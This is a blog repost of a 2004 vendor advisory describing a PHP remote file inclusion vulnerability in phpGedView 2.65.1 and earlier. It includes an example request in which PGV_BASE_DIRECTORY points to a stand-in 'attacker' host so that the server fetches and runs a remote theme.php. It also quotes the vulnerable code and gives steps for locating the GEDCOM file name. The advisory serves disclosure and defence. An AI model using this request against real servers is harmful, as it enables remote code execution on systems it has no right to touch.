PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
Summary:
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
Release Date:
January 29 2004
Severity:
High
SecureScout Testcase ID:
TC 17868 (Still in Development)
Vulnerable Systems:
phpGedView version 2.65.1 and prior
Vulnerability Type:
PHP Injection - force the Target to Execute a PHP file from Attackers Server
Vendor Status:
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem
Example:
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.
The attacker has to create on his web site a directory call themes/standard, and a file theme.php
For example: theme.php =
and the request, will execute the phpinfo() command on the vulnerable target.
Credits:
Cedric Cochin - netVigilance Vulnerability Research team
Friday, December 23, 2005
How To 9
Subscribe to:
Post Comments (Atom)
About Me
![[Valid Atom 1.0]](http://img98.imageshack.us/img98/5126/validatomqv8.png "Validate my Atom 1.0 feed")
... karena BLOG JUGA ADALAH KARYA CIPTA. Biasakan untuk meminta ijin kepada pemilik karya atau paling tidak menyebutkan sumber asal. Hitung-hitung bersilaturahmi dan memperluas pergaulan, bukan?
Semua unsur blog ini, termasuk gambar, foto, tulisan dan lainnya berada di bawah aturan Creative Common License, kecuali disebutkan sebaliknya.
No comments:
Post a Comment